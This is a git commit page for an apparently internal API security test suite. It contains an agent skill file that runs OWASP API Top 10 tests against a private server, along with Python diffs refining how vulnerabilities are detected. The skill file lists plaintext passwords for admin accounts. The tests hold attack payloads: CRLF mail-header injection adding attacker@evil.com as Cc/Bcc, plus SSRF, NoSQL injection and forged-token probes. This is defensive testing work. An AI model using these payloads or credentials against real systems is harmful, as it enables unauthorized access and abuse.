提交 ab3ddd19 authored 作者: 陈泽健's avatar 陈泽健

docs(prd): 更新接口安全测试需求文档并优化测试逻辑

- 添加 pycryptodome 依赖用于接口签名算法测试
- 新增接口签名机制说明(SHA256 + AES-CBC)
- 扩充测试载荷参考包括 NoSQL 注入、API 成批分配、SSRF 等
- 添加危险文件类型上传载荷和敏感路径探测字典
- 完善修复建议参考和安全测试报告模板
- 重构业务成功判断逻辑支持多字段校验
- 新增 _is_auth_success 函数统一认证成功判断
- 优化 NoSQL 注入测试级别调整和结果判断
- 增加桌牌同步 SSRF 和 SMTP 邮件注入测试用例
- 修复短信轰炸测试中的认证检查逻辑
上级 9f2f41df
---
name: AQCS-XTYPT
description: 新统一平台接口安全测试 - 执行OWASP API Top 10全量测试、历史漏洞回归、华为红线检查,生成报告并上传网盘
---
新统一平台接口安全测试自动化执行,严格按照PRD需求文档执行全部测试流程。
## Usage
/AQCS-XTYPT [步骤参数]
可选步骤参数(不传则执行全流程):
- `check` — 仅环境检查(依赖安装 + 网络连通性 + 账号登录验证)
- `test` — 仅执行测试(跳过环境检查,直接运行全部测试模块)
- `single <模块名>` — 仅执行单个模块(如 `single api02`
- `report` — 仅查看最近一次测试报告
- `full` — 执行全流程(默认,等同不传参数)
## Description
严格按照以下需求文档执行接口安全测试全流程:
- **PRD需求文档**: `Docs/PRD/接口安全测试/_PRD_接口安全测试_需求文档.md`
- **参考资料跟踪**: `Docs/PRD/接口安全测试/_PRD_接口安全测试_参考资料跟踪.md`
- **测试脚本**: `AuxiliaryTool/ScriptTool/ApiSecurityTest/run_all.py`
- **配置文件**: `AuxiliaryTool/ScriptTool/ApiSecurityTest/config.yaml`
- **知识库**: `AuxiliaryTool/ScriptTool/ApiSecurityTest/utils/knowledge_base.py`
- **README**: `AuxiliaryTool/ScriptTool/ApiSecurityTest/README.md`
**功能:**
- Python环境与依赖检查
- 目标服务器网络连通性验证
- 三账号登录验证(superadmin / admin@aq / user@aq)
- OWASP API Security Top 10 全量测试(10个模块、90个用例)
- 历史漏洞回归测试(35个历史漏洞 HV-001~HV-035)
- 华为安全红线合规检查(22项 HW-001~HW-022 + 5项伙伴红线)
- 生成完整安全测试报告(Markdown格式)
- 报告自动上传网盘
## 关键配置信息(来自config.yaml)
### 目标服务器
- **架构**: X86
- **系统**: EulerOS(欧拉)
- **IP**: 192.168.5.44
- **地址**: https://192.168.5.44/
- **SSL验证**: 关闭(verify_ssl: false)
### 测试账号
- **超管**: superadmin / Ubains@1357
- **管理员**: admin@aq / Ubains@1357
- **普通用户**: user@aq / Ubains@1357
- **固定验证码**: csba
### 认证配置
- **Token类型**: accessToken
- **认证机制**: JWT
- **登录接口**: /platform/api/auth/login
- **验证码接口**: /platform/api/code
### 测试限制
- 暴力破解最大尝试: 20次
- 限流测试最大请求: 100次
- 批量测试最大请求: 50次
- 请求间隔: 0.5秒
### 报告输出
- **本地路径**: `AuxiliaryTool/ScriptTool/ApiSecurityTest/reports/`
- **报告命名**: `{服务器IP}_安全测试报告_{时间戳}.md`
- **网盘路径**: `\\192.168.9.9\deploy\18其它系统\安全测试\04新统一平台-安全报告\`
## 执行步骤
### 阶段1: 环境检查与准备
1. **检查Python版本**(要求 3.8+)
```bash
python --version
```
2. **检查并安装依赖**
```bash
cd AuxiliaryTool/ScriptTool/ApiSecurityTest
pip install -r requirements.txt
```
依赖包:requests >= 2.28.0、colorama >= 0.4.6、pyyaml >= 6.0、pycryptodome >= 3.18.0
3. **检查配置文件**
- 确认 `config.yaml` 存在且配置正确
- 确认目标服务器地址、账号密码、验证码配置
- 确认 `utils/knowledge_base.py` 知识库文件存在
4. **验证网络连通性**
```bash
ping 192.168.5.44
curl -k https://192.168.5.44/platform/api/code
```
5. **验证账号登录**
- 使用三个账号分别登录,确认Token获取正常
- 如果全部登录失败则停止,报告错误
### 阶段2: 执行全量安全测试
1. **进入测试目录**
```bash
cd AuxiliaryTool/ScriptTool/ApiSecurityTest
```
2. **执行全部测试模块**
```bash
python run_all.py
```
3. **测试过程监控**
- 观察控制台输出,关注每个模块的执行结果
- 如果某个模块执行异常(如ImportError),记录错误但继续执行后续模块
- 统计每个模块的用例数和漏洞发现数
4. **10个测试模块执行顺序**:
| 序号 | 模块 | 测试内容 |
|------|------|---------|
| 1/10 | API1 | 对象级别授权失效(水平越权、IDOR) |
| 2/10 | API2 | 身份认证失效(Token伪造、NoSQL注入、暴力破解) |
| 3/10 | API3 | 对象属性级别授权失效(垂直越权、成批分配) |
| 4/10 | API4 | 资源消耗不受限(速率限制、文件上传) |
| 5/10 | API5 | 功能级别授权失效(普通用户访问管理员接口) |
| 6/10 | API6 | 无限制访问敏感业务流(批量注册、短信轰炸) |
| 7/10 | API7 | 服务器端请求伪造(SSRF内网探测) |
| 8/10 | API8 | 安全配置错误(Nacos未授权、Swagger暴露、SQL注入) |
| 9/10 | API9 | 库存管理不当(隐藏接口、旧版API暴露) |
| 10/10 | API10 | 不安全的第三方API集成(凭证泄露) |
### 阶段3: 报告生成与上传
1. **确认报告生成**
- 检查 `reports/` 目录下是否生成了新的报告文件
- 报告文件名格式:`{服务器IP}_安全测试报告_{时间戳}.md`
- 读取报告内容确认完整性
2. **查看测试摘要**
- 从控制台输出或报告内容中提取:
- 总测试用例数
- 高危/中危/低危/信息类漏洞数
- 已验证安全项数
3. **确认网盘上传结果**
- 工具会自动上传报告到 `\\192.168.9.9\deploy\18其它系统\安全测试\04新统一平台-安全报告\`
- 如果上传失败,手动拷贝报告到网盘目录
### 阶段4: 输出测试结果摘要
1. **向用户展示测试结果概要**,包括:
- 测试目标与时间
- 漏洞统计(高危/中危/低危/信息类数量)
- 关键发现(高危漏洞列表)
- 报告文件路径(本地 + 网盘)
2. **如果发现高危漏洞**,额外提醒:
- 列出每个高危漏洞的名称和影响接口
- 建议优先修复
## 单模块测试模式
当用户只需要执行某个特定模块时:
```bash
cd AuxiliaryTool/ScriptTool/ApiSecurityTest
python run_all.py <模块名>
```
可用模块名:`api01` ~ `api10`
示例:
- `/AQCS-XTYPT single api02` — 仅测试身份认证
- `/AQCS-XTYPT single api08` — 仅测试安全配置(含Nacos、SQL注入)
单模块测试同样会生成完整报告并上传网盘。
## ⚠️ 严格执行规则
1. **必须严格按照PRD需求文档执行测试,不得跳过任何测试模块**
2. **测试过程中不得修改 config.yaml 中的目标服务器地址和账号信息**
3. **所有测试仅在授权范围内的目标系统执行,禁止测试非授权目标**
4. **某个模块执行异常时,记录错误并继续执行后续模块,不得中断整体流程**
5. **测试完成后必须确认报告文件已生成且内容完整**
6. **如果网盘上传失败,必须手动将报告拷贝到网盘目录**
7. **所有测试结果必须如实记录,不得隐瞒漏洞或篡改结果**
8. **禁止使用可能导致服务不可用的攻击手法(如大流量DDoS)**
9. **测试过程中发现的敏感信息(密码、密钥)不得外泄**
10. **安全测试必须在测试环境执行,禁止在生产环境执行破坏性测试**
此差异已折叠。
...@@ -10,7 +10,7 @@ from utils.report_generator import VulnResult ...@@ -10,7 +10,7 @@ from utils.report_generator import VulnResult
def _is_success(resp): def _is_success(resp):
""" """
判断响应是否表示请求成功(即越权成功) 判断响应是否表示业务成功(即越权成功)
参数: 参数:
resp: requests.Response 对象 resp: requests.Response 对象
...@@ -20,23 +20,57 @@ def _is_success(resp): ...@@ -20,23 +20,57 @@ def _is_success(resp):
""" """
if resp is None: if resp is None:
return False return False
# 状态码为 200 且不是 401/403 类型的鉴权错误 # 401/403 直接表示鉴权拦截
if resp.status_code in (401, 403): if resp.status_code in (401, 403):
return False return False
# 非 200 状态码不算成功
if resp.status_code != 200: if resp.status_code != 200:
return False return False
# 检查响应体中的业务状态码
try: try:
data = resp.json() data = resp.json()
# 常见的业务错误码字段:code、status、errcode
# 1. 检查 success 字段(统一平台使用 success: false/0 表示业务失败)
if 'success' in data and not data['success']:
return False
# 2. 检查业务错误码
code = data.get('code', data.get('status', data.get('errcode'))) code = data.get('code', data.get('status', data.get('errcode')))
if code is not None: if code is not None:
# 401/403/40301 等通常表示鉴权失败 # 权限不足 / 鉴权失败类错误码
if str(code) in ('401', '403', '40301', '40101'): auth_denied_codes = (
'401', '403', '40301', '40101', # 通用鉴权错误
'B0027', # 权限不足。无法请求接口
'B0017', # 接口请求方式错误
'B0002', # 验证码失效
)
if str(code) in auth_denied_codes:
return False return False
# 3. 检查 message/msg 中的权限拒绝关键词
message = str(data.get('message', data.get('msg', '')))
if message:
deny_keywords = [
'权限不足', '不允许访问', '拒绝访问',
'未授权', '请登录', '重新登录', '已退出',
'AccessDenied',
]
if any(kw in message for kw in deny_keywords):
return False
# 4. 检查是否有有效数据返回(无数据不算越权成功)
result_data = data.get('data')
if result_data is None or result_data == {} or result_data == []:
# 允许 success=True 但 data 为空的情况(如删除/修改操作)
if data.get('success') is True:
return True
return False
return True
except Exception: except Exception:
pass pass
return True return False
def _safe_json(resp): def _safe_json(resp):
......
...@@ -9,6 +9,69 @@ from utils.logger import log ...@@ -9,6 +9,69 @@ from utils.logger import log
from utils.report_generator import VulnResult from utils.report_generator import VulnResult
def _is_auth_success(resp):
"""
判断响应是否表示认证成功(即成功绕过认证访问了接口)
参数:
resp: requests.Response 对象
返回:
bool: True 表示成功绕过认证(存在漏洞)
"""
if resp is None:
return False
if resp.status_code in (401, 403):
return False
if resp.status_code != 200:
return False
try:
data = resp.json()
# 1. 检查 success 字段(兼容 success: false 和 success: 0)
if 'success' in data and not data['success']:
return False
# 2. 检查业务错误码
code = data.get('code', data.get('status', data.get('errcode')))
if code is not None:
auth_denied_codes = (
'401', '403', '40301', '40101',
'A0076', # 无效token
'B0027', # 权限不足
'B0017', # 接口请求方式错误
'B0002', # 验证码失效
)
if str(code) in auth_denied_codes:
return False
# 3. 检查 message/msg 中的拒绝关键词
message = str(data.get('message', data.get('msg', '')))
if message:
deny_keywords = [
'权限不足', '不允许访问', '拒绝访问',
'未授权', '请登录', '重新登录', '已退出',
'无效token', 'token无效', 'token已过期',
'AccessDenied', '用户不存在',
]
if any(kw in message for kw in deny_keywords):
return False
# 4. 检查是否有有效数据返回
result_data = data.get('data', data.get('result'))
if result_data is None or result_data == {} or result_data == []:
if data.get('success') is True:
return True
return False
return True
except Exception:
# JSON 解析失败,不算成功
return False
def _safe_json(resp): def _safe_json(resp):
""" """
安全地获取响应 JSON 文本 安全地获取响应 JSON 文本
...@@ -73,15 +136,8 @@ def test_2_2_1(client, auth): ...@@ -73,15 +136,8 @@ def test_2_2_1(client, auth):
# 不传 Token,也不指定 account,构造无认证请求 # 不传 Token,也不指定 account,构造无认证请求
resp = client.get(path, params=params, token="", account=None) resp = client.get(path, params=params, token="", account=None)
if resp and resp.status_code == 200: if _is_auth_success(resp):
try: vulnerable_endpoints.append(path)
data = resp.json()
# 检查是否返回了有效数据(而不是错误信息)
code = data.get('code', data.get('status'))
if code and str(code) not in ('401', '403', '40301', '40101'):
vulnerable_endpoints.append(path)
except Exception:
vulnerable_endpoints.append(path)
request_info = _build_request_info( request_info = _build_request_info(
"GET", "/api/message/getMeetingList 等", "GET", "/api/message/getMeetingList 等",
...@@ -132,16 +188,9 @@ def test_2_2_2(client, auth): ...@@ -132,16 +188,9 @@ def test_2_2_2(client, auth):
resp = client.get("/api/system/getUserInfo", resp = client.get("/api/system/getUserInfo",
token=fake_token, account=None) token=fake_token, account=None)
if resp and resp.status_code == 200: if _is_auth_success(resp):
try: vulnerable = True
data = resp.json() success_tokens.append(fake_token[:50])
code = data.get('code', data.get('status'))
if code and str(code) not in ('401', '403', '40301', '40101'):
vulnerable = True
success_tokens.append(fake_token[:50])
except Exception:
vulnerable = True
success_tokens.append(fake_token[:50])
request_info = _build_request_info( request_info = _build_request_info(
"GET", "/api/system/getUserInfo", "GET", "/api/system/getUserInfo",
...@@ -198,22 +247,16 @@ def test_2_2_3(client, auth): ...@@ -198,22 +247,16 @@ def test_2_2_3(client, auth):
resp = client.get("/api/system/getUserInfo", resp = client.get("/api/system/getUserInfo",
token=expired_token, account=None) token=expired_token, account=None)
if resp and resp.status_code == 200: if _is_auth_success(resp):
try: return VulnResult(
data = resp.json() test_id=test_id, name=name, level=VulnResult.LEVEL_HIGH,
code = data.get('code', data.get('status')) description="使用构造的过期 Token 成功访问了接口,"
if code and str(code) not in ('401', '403', '40301', '40101'): "服务端未正确校验 Token 过期时间",
return VulnResult( request_info=request_info,
test_id=test_id, name=name, level=VulnResult.LEVEL_HIGH, response_info=_safe_json(resp),
description="使用构造的过期 Token 成功访问了接口," is_vulnerable=True,
"服务端未正确校验 Token 过期时间", fix_suggestion="服务端必须校验 Token 的过期时间(exp 字段),拒绝所有已过期的 Token"
request_info=request_info, )
response_info=_safe_json(resp),
is_vulnerable=True,
fix_suggestion="服务端必须校验 Token 的过期时间(exp 字段),拒绝所有已过期的 Token"
)
except Exception:
pass
return VulnResult( return VulnResult(
test_id=test_id, name=name, level=VulnResult.LEVEL_HIGH, test_id=test_id, name=name, level=VulnResult.LEVEL_HIGH,
...@@ -556,14 +599,8 @@ def test_2_2_8(client, auth): ...@@ -556,14 +599,8 @@ def test_2_2_8(client, auth):
token=token_first, account=None) token=token_first, account=None)
first_token_valid = False first_token_valid = False
if resp_check and resp_check.status_code == 200: if _is_auth_success(resp_check):
try: first_token_valid = True
data = resp_check.json()
code = data.get('code', data.get('status'))
if code and str(code) not in ('401', '403', '40301', '40101'):
first_token_valid = True
except Exception:
first_token_valid = True
# 如果第二次登录成功且第一个 Token 仍然有效,说明支持并发登录 # 如果第二次登录成功且第一个 Token 仍然有效,说明支持并发登录
if token_second and first_token_valid: if token_second and first_token_valid:
...@@ -860,7 +897,7 @@ def test_2_2_12(client, auth): ...@@ -860,7 +897,7 @@ def test_2_2_12(client, auth):
if vulnerable_payloads: if vulnerable_payloads:
return VulnResult( return VulnResult(
test_id=test_id, name=name, level=VulnResult.LEVEL_CRITICAL, test_id=test_id, name=name, level=VulnResult.LEVEL_HIGH,
description=f"登录接口存在NoSQL注入漏洞(CVSS 9.4),以下注入载荷成功绕过认证: " description=f"登录接口存在NoSQL注入漏洞(CVSS 9.4),以下注入载荷成功绕过认证: "
f"{vulnerable_payloads}。" f"{vulnerable_payloads}。"
f"攻击者无需密码即可登录任意账户,属于紧急安全漏洞", f"攻击者无需密码即可登录任意账户,属于紧急安全漏洞",
...@@ -873,7 +910,7 @@ def test_2_2_12(client, auth): ...@@ -873,7 +910,7 @@ def test_2_2_12(client, auth):
) )
return VulnResult( return VulnResult(
test_id=test_id, name=name, level=VulnResult.LEVEL_CRITICAL, test_id=test_id, name=name, level=VulnResult.LEVEL_INFO,
description="NoSQL注入攻击均被正确拦截,登录接口参数类型校验正常", description="NoSQL注入攻击均被正确拦截,登录接口参数类型校验正常",
request_info=request_info, request_info=request_info,
response_info="所有NoSQL注入载荷均未成功登录", response_info="所有NoSQL注入载荷均未成功登录",
...@@ -942,25 +979,19 @@ def test_2_2_13(client, auth): ...@@ -942,25 +979,19 @@ def test_2_2_13(client, auth):
f"3. 使用旧Token再次访问 /api/system/getUserInfo\n" f"3. 使用旧Token再次访问 /api/system/getUserInfo\n"
f"旧Token: {user_token[:50]}...") f"旧Token: {user_token[:50]}...")
if verify_resp_after and verify_resp_after.status_code == 200: if _is_auth_success(verify_resp_after):
try: return VulnResult(
data = verify_resp_after.json() test_id=test_id, name=name, level=VulnResult.LEVEL_HIGH,
code = data.get('code', data.get('status')) description="注销后旧Token仍然有效,可正常访问认证接口。"
if code and str(code) not in ('401', '403', '40301', '40101'): "存在会话管理漏洞,攻击者获取已注销的Token后仍可持续访问",
return VulnResult( request_info=request_info,
test_id=test_id, name=name, level=VulnResult.LEVEL_HIGH, response_info=f"注销前: HTTP {verify_resp_before.status_code}\n"
description="注销后旧Token仍然有效,可正常访问认证接口。" f"注销后: HTTP {verify_resp_after.status_code}, body: {_safe_json(verify_resp_after)}",
"存在会话管理漏洞,攻击者获取已注销的Token后仍可持续访问", is_vulnerable=True,
request_info=request_info, fix_suggestion="1. 注销时在服务端将Token加入黑名单或从缓存中删除;"
response_info=f"注销前: HTTP {verify_resp_before.status_code}\n" "2. 设置Token合理的过期时间;"
f"注销后: HTTP {verify_resp_after.status_code}, body: {_safe_json(verify_resp_after)}", "3. 确保注销后所有关联的会话标识全部失效"
is_vulnerable=True,
fix_suggestion="1. 注销时在服务端将Token加入黑名单或从缓存中删除;"
"2. 设置Token合理的过期时间;"
"3. 确保注销后所有关联的会话标识全部失效"
) )
except Exception:
pass
return VulnResult( return VulnResult(
test_id=test_id, name=name, level=VulnResult.LEVEL_HIGH, test_id=test_id, name=name, level=VulnResult.LEVEL_HIGH,
......
...@@ -9,7 +9,7 @@ from utils.report_generator import VulnResult ...@@ -9,7 +9,7 @@ from utils.report_generator import VulnResult
def _is_success(resp): def _is_success(resp):
""" """
判断响应是否表示请求成功(即越权成功) 判断响应是否表示业务成功(即越权成功)
参数: 参数:
resp: requests.Response 对象 resp: requests.Response 对象
...@@ -19,21 +19,57 @@ def _is_success(resp): ...@@ -19,21 +19,57 @@ def _is_success(resp):
""" """
if resp is None: if resp is None:
return False return False
# 状态码为 401/403 表示鉴权生效,不算越权 # 401/403 直接表示鉴权拦截
if resp.status_code in (401, 403): if resp.status_code in (401, 403):
return False return False
# 非 200 状态码不算成功
if resp.status_code != 200: if resp.status_code != 200:
return False return False
# 检查响应体中的业务状态码
try: try:
data = resp.json() data = resp.json()
# 1. 检查 success 字段(统一平台使用 success: false/0 表示业务失败)
if 'success' in data and not data['success']:
return False
# 2. 检查业务错误码
code = data.get('code', data.get('status', data.get('errcode'))) code = data.get('code', data.get('status', data.get('errcode')))
if code is not None: if code is not None:
if str(code) in ('401', '403', '40301', '40101'): # 权限不足 / 鉴权失败类错误码
auth_denied_codes = (
'401', '403', '40301', '40101', # 通用鉴权错误
'B0027', # 权限不足。无法请求接口
'B0017', # 接口请求方式错误
'B0002', # 验证码失效
)
if str(code) in auth_denied_codes:
return False return False
# 3. 检查 message/msg 中的权限拒绝关键词
message = str(data.get('message', data.get('msg', '')))
if message:
deny_keywords = [
'权限不足', '不允许访问', '拒绝访问',
'未授权', '请登录', '重新登录', '已退出',
'AccessDenied',
]
if any(kw in message for kw in deny_keywords):
return False
# 4. 检查是否有有效数据返回(无数据不算越权成功)
result_data = data.get('data')
if result_data is None or result_data == {} or result_data == []:
# 允许 success=True 但 data 为空的情况(如删除/修改操作)
if data.get('success') is True:
return True
return False
return True
except Exception: except Exception:
pass pass
return True return False
def _safe_json(resp): def _safe_json(resp):
......
...@@ -10,7 +10,7 @@ from utils.report_generator import VulnResult ...@@ -10,7 +10,7 @@ from utils.report_generator import VulnResult
def _is_success(resp): def _is_success(resp):
""" """
判断响应是否表示请求成功 判断响应是否表示业务成功
参数: 参数:
resp: requests.Response 对象 resp: requests.Response 对象
...@@ -20,19 +20,57 @@ def _is_success(resp): ...@@ -20,19 +20,57 @@ def _is_success(resp):
""" """
if resp is None: if resp is None:
return False return False
# 401/403 直接表示鉴权拦截
if resp.status_code in (401, 403): if resp.status_code in (401, 403):
return False return False
# 非 200 状态码不算成功
if resp.status_code != 200: if resp.status_code != 200:
return False return False
try: try:
data = resp.json() data = resp.json()
# 1. 检查 success 字段(统一平台使用 success: false/0 表示业务失败)
if 'success' in data and not data['success']:
return False
# 2. 检查业务错误码
code = data.get('code', data.get('status', data.get('errcode'))) code = data.get('code', data.get('status', data.get('errcode')))
if code is not None: if code is not None:
if str(code) in ('401', '403', '40301', '40101'): # 权限不足 / 鉴权失败类错误码
auth_denied_codes = (
'401', '403', '40301', '40101', # 通用鉴权错误
'B0027', # 权限不足。无法请求接口
'B0017', # 接口请求方式错误
'B0002', # 验证码失效
)
if str(code) in auth_denied_codes:
return False return False
# 3. 检查 message/msg 中的权限拒绝关键词
message = str(data.get('message', data.get('msg', '')))
if message:
deny_keywords = [
'权限不足', '不允许访问', '拒绝访问',
'未授权', '请登录', '重新登录', '已退出',
'AccessDenied',
]
if any(kw in message for kw in deny_keywords):
return False
# 4. 检查是否有有效数据返回(无数据不算越权成功)
result_data = data.get('data')
if result_data is None or result_data == {} or result_data == []:
# 允许 success=True 但 data 为空的情况(如删除/修改操作)
if data.get('success') is True:
return True
return False
return True
except Exception: except Exception:
pass pass
return True return False
def _safe_json(resp): def _safe_json(resp):
...@@ -309,11 +347,16 @@ def test_2_4_3(client, auth): ...@@ -309,11 +347,16 @@ def test_2_4_3(client, auth):
if resp and resp.status_code == 200: if resp and resp.status_code == 200:
try: try:
data = resp.json() data = resp.json()
# 检查是否真的上传成功(而非业务错误)
if not _is_success(resp):
continue
code = data.get('code', data.get('status')) code = data.get('code', data.get('status'))
if code and str(code) not in ('413', '429'): if code and str(code) in ('413', '429'):
vulnerable_endpoints.append(path) continue
except Exception:
vulnerable_endpoints.append(path) vulnerable_endpoints.append(path)
except Exception:
# JSON 解析失败不算上传成功
pass
except Exception as e: except Exception as e:
log.debug(f"[{test_id}] 上传测试 {path} 异常: {e}") log.debug(f"[{test_id}] 上传测试 {path} 异常: {e}")
...@@ -640,19 +683,20 @@ def test_2_4_7(client, auth): ...@@ -640,19 +683,20 @@ def test_2_4_7(client, auth):
if resp and resp.status_code == 200: if resp and resp.status_code == 200:
try: try:
data = resp.json() data = resp.json()
# 检查是否真的上传成功(而非业务错误)
if not _is_success(resp):
continue
code = data.get('code', data.get('status')) code = data.get('code', data.get('status'))
if code and str(code) not in ('415', '400'): if code and str(code) in ('415', '400'):
uploaded_types.append({ continue
'endpoint': path,
'filename': filename,
'mime': mime_type
})
except Exception:
uploaded_types.append({ uploaded_types.append({
'endpoint': path, 'endpoint': path,
'filename': filename, 'filename': filename,
'mime': mime_type 'mime': mime_type
}) })
except Exception:
# JSON 解析失败不算上传成功
pass
except Exception as e: except Exception as e:
log.debug(f"[{test_id}] 上传 {filename} 到 {path} 异常: {e}") log.debug(f"[{test_id}] 上传 {filename} 到 {path} 异常: {e}")
......
...@@ -466,6 +466,35 @@ def _test_2_6_4(client): ...@@ -466,6 +466,35 @@ def _test_2_6_4(client):
try: try:
data = resp.json() data = resp.json()
msg_val = str(data.get('msg', data.get('message', ''))) msg_val = str(data.get('msg', data.get('message', '')))
code_val = str(data.get('code', data.get('status', '')))
# 优先检查:认证拒绝(需要登录才能调用,不是漏洞)
auth_denied_codes = ('401', '403', '40301', '40101', 'B0027', 'B0017', 'B0002')
auth_denied_msgs = ('令牌不能为空', 'token不能为空', '未登录', '请登录',
'权限不足', '不允许访问', '拒绝访问', 'AccessDenied')
if code_val in auth_denied_codes:
sub_results.append(VulnResult(
test_id="2.6.4",
name=f"短信轰炸测试 - {path}",
level=VulnResult.LEVEL_INFO,
description=f"接口 {path} 需要认证才能调用(code={code_val}),不存在短信轰炸风险",
request_info=request_info,
response_info=resp_info,
is_vulnerable=False
))
continue
if any(kw in msg_val for kw in auth_denied_msgs):
sub_results.append(VulnResult(
test_id="2.6.4",
name=f"短信轰炸测试 - {path}",
level=VulnResult.LEVEL_INFO,
description=f"接口 {path} 需要认证才能调用({msg_val}),不存在短信轰炸风险",
request_info=request_info,
response_info=resp_info,
is_vulnerable=False
))
continue
# 检查是否有频率限制提示 # 检查是否有频率限制提示
has_rate_limit = ( has_rate_limit = (
'频繁' in msg_val or '限制' in msg_val or '频繁' in msg_val or '限制' in msg_val or
......
...@@ -637,3 +637,165 @@ def _test_2_7_7(client, user_token): ...@@ -637,3 +637,165 @@ def _test_2_7_7(client, user_token):
)) ))
return sub_results return sub_results
# ================================================================
# 2.7.8: 桌牌同步SSRF (HV-024)
# ================================================================
def _test_2_7_8(client, user_token, ssrf_payloads):
"""
2.7.8: 桌牌同步接口 SSRF 测试
基于历史漏洞 HV-024(长安深蓝汽车 IAST 报告)映射
测试接口: POST /api/tableCard/syncTableCard
"""
test_id = "2.7.8"
name = "桌牌同步SSRF测试 (HV-024)"
log.info(f"[{test_id}] {name}")
if not user_token:
return VulnResult(
test_id=test_id, name=name, level=VulnResult.LEVEL_INFO,
description="user Token 获取失败,跳过测试",
is_vulnerable=False
)
# 桌牌同步接口 SSRF 载荷
target_path = "/api/tableCard/syncTableCard"
vulnerable_payloads = []
for payload_url in ssrf_payloads[:3]: # 仅测试前3个核心载荷
body = {
"url": payload_url,
"deviceCode": "SEC_TEST_DEVICE",
"syncType": "all"
}
resp = client.post(target_path, json_data=body, token=user_token)
if resp and resp.status_code == 200:
try:
data = resp.json()
# 检查是否返回了内网响应内容
resp_text = resp.text[:500]
ssrf_indicators = ['nacos', 'redis', 'mysql', 'connection', 'refused',
'timeout', '<html', '<!doctype', 'root:x:']
for indicator in ssrf_indicators:
if indicator.lower() in resp_text.lower():
vulnerable_payloads.append(payload_url)
break
# 检查业务拒绝
if data.get('success') is False:
continue
code = str(data.get('code', ''))
if code in ('B0027', 'B0017', 'B0002'):
continue
except (ValueError, AttributeError):
pass
request_info = _build_request_info(
"POST", target_path,
body='{"url": "SSRF载荷", "deviceCode": "SEC_TEST_DEVICE", "syncType": "all"}',
auth_desc="使用普通用户 Token"
)
if vulnerable_payloads:
return VulnResult(
test_id=test_id, name=name, level=VulnResult.LEVEL_HIGH,
description=f"桌牌同步接口存在 SSRF 漏洞,以下载荷成功获取到内网响应: "
f"{vulnerable_payloads}。来源: HV-024 长安深蓝汽车 IAST 报告",
request_info=request_info,
response_info=f"SSRF 成功的载荷: {vulnerable_payloads}",
is_vulnerable=True,
fix_suggestion="1. 对 url 参数进行严格白名单校验,仅允许合法的桌牌设备地址;"
"2. 禁止请求内网 IP 地址(10.x/172.16-31.x/192.168.x/127.x);"
"3. 配置出站网络策略限制服务器的出站连接范围"
)
return VulnResult(
test_id=test_id, name=name, level=VulnResult.LEVEL_INFO,
description="桌牌同步接口 SSRF 测试未发现漏洞,接口可能已限制出站请求",
request_info=request_info,
response_info="所有 SSRF 载荷均未返回内网响应特征",
is_vulnerable=False
)
# ================================================================
# 2.7.9: SMTP邮件注入测试 (HV-023)
# ================================================================
def _test_2_7_9(client, user_token):
"""
2.7.9: SMTP邮件注入测试
基于历史漏洞 HV-023(长安深蓝汽车 IAST 报告)映射
测试接口: POST /api/email/verify
"""
test_id = "2.7.9"
name = "SMTP邮件注入测试 (HV-023)"
log.info(f"[{test_id}] {name}")
if not user_token:
return VulnResult(
test_id=test_id, name=name, level=VulnResult.LEVEL_INFO,
description="user Token 获取失败,跳过测试",
is_vulnerable=False
)
target_path = "/api/email/verify"
# 邮件注入测试载荷
inject_payloads = [
{"email": "test@test.com%0ACc:attacker@evil.com"},
{"email": "test@test.com%0ABcc:attacker@evil.com"},
{"email": "test@test.com\r\nCc: attacker@evil.com"},
{"email": "test@test.com\nBcc: attacker@evil.com"},
]
vulnerable_payloads = []
for payload in inject_payloads:
resp = client.post(target_path, json_data=payload, token=user_token)
if resp and resp.status_code == 200:
try:
data = resp.json()
# 检查是否业务成功(即邮件被发送)
if data.get('success') is True:
code = str(data.get('code', ''))
if code not in ('B0027', 'B0017', 'B0002'):
vulnerable_payloads.append(payload['email'])
elif data.get('success') is False:
continue
else:
# 兼容其他响应格式
code = str(data.get('code', ''))
if code in ('0', '200', '1', '2000'):
vulnerable_payloads.append(payload['email'])
except (ValueError, AttributeError):
pass
request_info = _build_request_info(
"POST", target_path,
body='{"email": "包含CRLF注入的邮箱地址"}',
auth_desc="使用普通用户 Token"
)
if vulnerable_payloads:
return VulnResult(
test_id=test_id, name=name, level=VulnResult.LEVEL_HIGH,
description=f"邮件验证接口存在 SMTP 注入漏洞,以下载荷可能成功注入: "
f"{vulnerable_payloads}。来源: HV-023 长安深蓝汽车 IAST 报告",
request_info=request_info,
response_info=f"可能注入成功的载荷: {vulnerable_payloads}",
is_vulnerable=True,
fix_suggestion="1. 对 email 参数进行严格格式校验,仅允许标准邮箱格式;"
"2. 过滤 CRLF 字符(\\r\\n);"
"3. 使用安全的邮件发送库,避免直接拼接邮件头"
)
return VulnResult(
test_id=test_id, name=name, level=VulnResult.LEVEL_INFO,
description="邮件验证接口 SMTP 注入测试未发现漏洞",
request_info=request_info,
response_info="所有 CRLF 注入载荷均未成功",
is_vulnerable=False
)
...@@ -1249,6 +1249,66 @@ def _test_2_8_11(client): ...@@ -1249,6 +1249,66 @@ def _test_2_8_11(client):
status_code = resp.status_code if resp else 0 status_code = resp.status_code if resp else 0
if status_code == 200: if status_code == 200:
# 增加响应体验证:检查是否为权限拒绝或业务错误
is_auth_denied = False
response_body_preview = ""
try:
data = resp.json()
response_body_preview = resp.text[:300]
# 1. 检查 success 字段(兼容 success: false 和 success: 0)
if 'success' in data and not data['success']:
is_auth_denied = True
# 2. 检查业务错误码
code = data.get('code', data.get('status', data.get('errcode')))
if code is not None:
auth_denied_codes = (
'401', '403', '40301', '40101',
'B0027', 'B0017', 'B0002',
)
if str(code) in auth_denied_codes:
is_auth_denied = True
# 3. 检查 message 中的权限拒绝关键词
message = str(data.get('message', data.get('msg', '')))
if message:
deny_keywords = [
'权限不足', '不允许访问', '拒绝访问',
'未授权', '请登录', '重新登录', '已退出',
'AccessDenied', '用户不存在',
]
if any(kw in message for kw in deny_keywords):
is_auth_denied = True
except (ValueError, AttributeError):
# 非 JSON 响应(如 HTML/Nacos 控制台),这类可能是真正的配置错误
response_body_preview = resp.text[:300] if resp else ""
# Nacos 控制台、Swagger 等特殊端点即使返回 HTML 也视为漏洞
if any(special in path for special in ['/nacos/', '/swagger', '/actuator/']):
is_auth_denied = False # 特殊端点不检查权限拒绝
else:
# 其他端点检查是否包含"登录页面"等关键词
login_keywords = ['login', '登录', '请登录', 'signin']
if any(kw in response_body_preview.lower() for kw in login_keywords):
is_auth_denied = True
if is_auth_denied:
# 权限拒绝或业务错误,不是漏洞
log.debug(f" {path} 返回 200 但业务拒绝 — {desc}")
